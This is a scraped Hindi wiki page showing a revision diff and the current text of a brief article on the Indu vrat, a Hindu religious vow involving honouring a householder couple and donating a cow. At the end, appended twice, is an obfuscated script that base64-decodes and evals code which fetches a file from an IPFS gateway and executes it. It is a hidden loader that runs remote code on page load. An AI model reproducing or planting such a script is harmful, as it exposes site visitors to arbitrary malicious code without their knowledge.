Difference between revisions of "इन्दु व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*यह व्रत 60 संवत्सर व्रतों में 58वाँ व्रत है। <ref>कृत्यकल्पतरु (व्रतखण्ड 451), हेमाद्रि व्रतखण्ड (2, 883)।</ref>  
+
*यह व्रत 60 संवत्सर व्रतों में 58वाँ व्रत है।<ref>कृत्यकल्पतरु (व्रतखण्ड 451), हेमाद्रि व्रतखण्ड (2, 883)।</ref>  
 
*इसमें दिन में तीन बार किसी गृहस्थ एवं उसकी पत्नी को सम्मानित किया जाता है और वर्ष के अन्त में एक गाय दान दी जाती है।  
 
*इसमें दिन में तीन बार किसी गृहस्थ एवं उसकी पत्नी को सम्मानित किया जाता है और वर्ष के अन्त में एक गाय दान दी जाती है।  
 
 
 
 
{{लेख प्रगति
+
 
|आधार=आधार1
+
{{प्रचार}}
|प्रारम्भिक=
+
{{संदर्भ ग्रंथ}}
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 05:27, 14 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat 60 sanvatsar vratoan mean 58vaan vrat hai.[1]
  • isamean din mean tin bar kisi grihasth evan usaki patni ko sammanit kiya jata hai aur varsh ke ant mean ek gay dan di jati hai.

 


tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 451), hemadri vratakhand (2, 883).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>